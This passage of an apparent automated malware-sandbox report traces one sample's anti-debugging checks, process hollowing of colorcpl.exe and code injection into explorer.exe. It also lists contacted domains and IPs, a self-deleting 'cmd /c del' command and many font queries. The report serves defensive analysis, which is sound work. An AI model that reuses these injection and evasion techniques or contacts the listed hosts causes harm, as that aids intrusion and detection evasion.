            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04FB0EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04FB0EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04FB0EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EFAAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EFAAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F1D294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F1D294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F7FE87 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EF766D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F0AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F0AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F0AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F0AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F0AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F2927A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F9B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F9B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04FB8A62 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F74257 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EE9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EE9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EE9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EE9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EF7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EF7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EF7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EF7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EF7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EF7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F9FE3F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EEE620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F24A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F24A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EF8A0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F03A1C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F1A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F1A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EEC600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EEC600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EEC600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F18E00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EEAA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EEAA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EE5210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EE5210 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EE5210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EE5210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F237F5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F103E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F103E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F103E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F103E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F103E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F103E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F0DBE9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F653CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F653CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F14BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F14BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F14BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04FB5BA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EF1B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EF1B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F1B390 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F67794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F67794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F67794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F12397 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04FA138A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F9D380 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EF8794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F13B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F13B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EEDB60 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EFFF60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04FB8F6A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04FB8B58 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EEDB40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EFEF40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EEF358 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EE4F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EE4F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F1E730 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04FA131B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F0F716 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F7FF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F7FF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04FB070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04FB070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F1A70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F1A70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess queried: DebugPort
            Source: C:\Windows\SysWOW64\colorcpl.exeProcess queried: DebugPort
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeCode function: 6_2_00409B30 LdrLoadDll,
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\explorer.exeDomain query: www.marmorariapiramide.online
            Source: C:\Windows\explorer.exeDomain query: www.emptycc.net
            Source: C:\Windows\explorer.exeDomain query: www.traexcel.com
            Source: C:\Windows\explorer.exeDomain query: www.rangerbuddys.com
            Source: C:\Windows\explorer.exeDomain query: www.omniriot.com
            Source: C:\Windows\explorer.exeNetwork Connect: 104.143.9.211 80
            Source: C:\Windows\explorer.exeDomain query: www.vetpipes.com
            Source: C:\Windows\explorer.exeNetwork Connect: 143.198.15.243 80
            Source: C:\Windows\explorer.exeNetwork Connect: 154.208.82.163 80
            Source: C:\Windows\explorer.exeNetwork Connect: 103.11.189.189 80
            Sample uses process hollowing techniqueShow sources
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeSection unmapped: C:\Windows\SysWOW64\colorcpl.exe base address: DC0000
            Maps a DLL or memory area into another processShow sources
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeSection loaded: unknown target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeSection loaded: unknown target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
            Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Injects a PE file into a foreign processesShow sources
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeMemory written: C:\Users\user\Desktop\3cGH9Bakuq.exe base: 400000 value starts with: 4D5A
            Queues an APC in another process (thread injection)Show sources
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeThread APC queued: target process: C:\Windows\explorer.exe
            Modifies the context of a thread in another process (thread injection)Show sources
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeThread register set: target process: 3424
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeThread register set: target process: 3424
            Source: C:\Windows\SysWOW64\colorcpl.exeThread register set: target process: 3424
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess created: C:\Users\user\Desktop\3cGH9Bakuq.exe C:\Users\user\Desktop\3cGH9Bakuq.exe
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess created: C:\Users\user\Desktop\3cGH9Bakuq.exe C:\Users\user\Desktop\3cGH9Bakuq.exe
            Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\3cGH9Bakuq.exe'
            Source: explorer.exe, 00000007.00000000.721665647.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
            Source: explorer.exe, 00000007.00000000.759104586.0000000001080000.00000002.00020000.sdmp, colorcpl.exe, 0000000F.00000002.929454695.0000000003770000.00000002.00020000.sdmpBinary or memory string: Program Manager
            Source: explorer.exe, 00000007.00000000.759104586.0000000001080000.00000002.00020000.sdmp, colorcpl.exe, 0000000F.00000002.929454695.0000000003770000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000007.00000000.759104586.0000000001080000.00000002.00020000.sdmp, colorcpl.exe, 0000000F.00000002.929454695.0000000003770000.00000002.00020000.sdmpBinary or memory string: Progman
            Source: explorer.exe, 00000007.00000000.759104586.0000000001080000.00000002.00020000.sdmp, colorcpl.exe, 0000000F.00000002.929454695.0000000003770000.00000002.00020000.sdmpBinary or memory string: Progmanlock
            Source: explorer.exe, 00000007.00000000.700488613.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Users\user\Desktop\3cGH9Bakuq.exe VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
